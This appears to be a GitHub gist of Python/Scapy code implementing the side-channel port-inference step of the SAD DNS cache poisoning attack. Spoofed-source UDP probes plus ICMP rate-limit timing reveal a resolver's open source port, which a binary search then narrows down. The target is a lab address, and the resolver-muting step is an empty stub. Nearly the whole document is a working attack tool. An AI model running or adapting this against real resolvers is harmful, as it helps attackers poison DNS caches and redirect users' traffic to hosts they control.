Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save WangYihang/edc196131f1d35d53ba63dafa419f1d5 to your computer and use it in GitHub Desktop.
Save WangYihang/edc196131f1d35d53ba63dafa419f1d5 to your computer and use it in GitHub Desktop.
DNS Cache Poisoning Attack Reloaded: Revolutions with Side Channels
#!/usr/bin/env python
import time

from scapy.all import *
from faker import Faker
class SAD:
    """Locate an open UDP port on a host by watching its ICMP replies.

    The scanner sends batches of ``icmp_ratelimit`` UDP probes with random
    spoofed source addresses, then sends one probe from its own address to
    ``PADDING_PORT`` and checks whether an ICMP port-unreachable comes back.
    A batch for which that reply arrives is treated as containing the open
    port (presumably because the target's ICMP budget was not used up by
    the spoofed probes -- confirm against the target's rate-limit settings).

    The instance owns a raw layer-2 socket; call ``close()`` or use the
    instance as a context manager to release it.
    """

    # Destination port of padding probes and of the verification probe.
    # NOTE(review): the technique assumes this port is closed on the target.
    PADDING_PORT = 1

    def __init__(self, fdns, iface="ens33") -> None:
        """Open the raw socket and set the scan parameters.

        Args:
            fdns: IP address of the host to scan.
            iface: Name of the network interface to send and sniff on.
        """
        self.start_port = 0x8000
        self.end_port = 0x10000  # exclusive upper bound of the scan
        self.socket = conf.L2socket(iface=iface)
        self.icmp_ratelimit = 20  # number of probes per batch
        self.fdns = fdns
        self.wait_time = 0.005  # pause (seconds) before each batch
        self.packets_sent = 0
        self.bytes_sent = 0
        self.faker = Faker()

    def close(self):
        """Close the underlying raw socket."""
        self.socket.close()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.close()

    def _destination_ports(self, section_start, first, last):
        """Return the destination port for every slot of one batch.

        Slots whose offset lies in ``[first, last]`` target
        ``section_start + offset``. Every other slot, and any slot whose
        port would fall outside the scanned range or the 16-bit UDP port
        space, targets ``PADDING_PORT`` so the batch always has exactly
        ``icmp_ratelimit`` probes.
        """
        limit = min(self.end_port, 0x10000)
        ports = []
        for offset in range(self.icmp_ratelimit):
            port = section_start + offset
            probed = first <= offset <= last and port < limit
            ports.append(port if probed else self.PADDING_PORT)
        return ports

    def _build_probes(self, dports):
        """Build one spoofed-source UDP probe per destination port."""
        return [
            Ether() / IP(src=self.faker.ipv4(), dst=self.fdns) / UDP(dport=dport)
            for dport in dports
        ]

    def _send_all(self, packets):
        """Send the packets back to back and update the traffic counters."""
        for packet in packets:
            self.socket.send(packet)
            self.packets_sent += 1
            self.bytes_sent += len(bytes(packet))

    def scan(self):
        """Probe the port range batch by batch.

        Returns:
            The first port of the first batch for which ``wait()`` reports a
            reply, or ``None`` when no batch does.
        """
        for i in range(self.start_port, self.end_port, self.icmp_ratelimit):
            time.sleep(self.wait_time)
            # Build everything up front so the send loop is as tight as
            # possible. The final batch is padded instead of running past
            # the last valid port.
            packets = self._build_probes(
                self._destination_ports(i, 0, self.icmp_ratelimit - 1)
            )
            start = time.time()
            self._send_all(packets)
            end = time.time()
            print(i, i + self.icmp_ratelimit, end - start)
            if self.wait():
                return i
        return None

    def wait(self):
        """Send the verification probe and report whether it was answered.

        Returns:
            ``True`` if an ICMP destination-unreachable / port-unreachable
            (type 3, code 3) reply arrives within 20 ms, else ``False``.
        """
        probe = Ether() / IP(dst=self.fdns) / UDP(dport=self.PADDING_PORT)
        reply = self.socket.sr1(probe, timeout=0.02, verbose=False)
        if reply is None or not reply.haslayer(ICMP):
            return False
        icmp = reply.getlayer(ICMP)
        return icmp.type == 0x03 and icmp.code == 0x03

    def generate(self, section_start, l, r):
        """Build the batch that tests the lower half of offsets ``[l, r]``.

        Offsets ``l`` through ``(l + r) // 2`` are sent to their real port
        (``section_start + offset``); every other slot is a padding probe.

        Returns:
            A list of ``icmp_ratelimit`` packets.
        """
        mid = (l + r) // 2
        return self._build_probes(self._destination_ports(section_start, l, mid))

    def guess(self, section_start):
        """Binary-search a batch for the single port that triggers a reply.

        Args:
            section_start: First port of the batch, as returned by
                ``scan()``. ``None`` (nothing found) is passed through.

        Returns:
            The inferred port number, or ``None`` if ``section_start`` is
            ``None``.
        """
        if section_start is None:
            return None
        l, r = 0, self.icmp_ratelimit - 1
        while l < r:
            time.sleep(self.wait_time)
            m = (l + r) // 2
            self._send_all(self.generate(section_start, l, r))
            rcvd = self.wait()
            print(l, m, r)
            if rcvd:
                # A reply means the port is in the probed lower half.
                r = m
            else:
                l = m + 1
        return section_start + l

    def mute(self, resolver):
        """Placeholder; not implemented."""
        pass
def test():
    """Run a scan against the lab host and print the inferred port.

    Prints a notice instead of a port when the scan finds no candidate
    batch, and always closes the scanner's raw socket.
    """
    fdns = "192.168.88.130"
    sad = SAD(fdns=fdns)
    try:
        section_start = sad.scan()
        if section_start is None:
            # scan() found nothing; guess() has no batch to search.
            print("no open port found")
            return
        port = sad.guess(section_start=section_start)
        print(port)
    finally:
        sad.socket.close()


if __name__ == "__main__":
    test()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment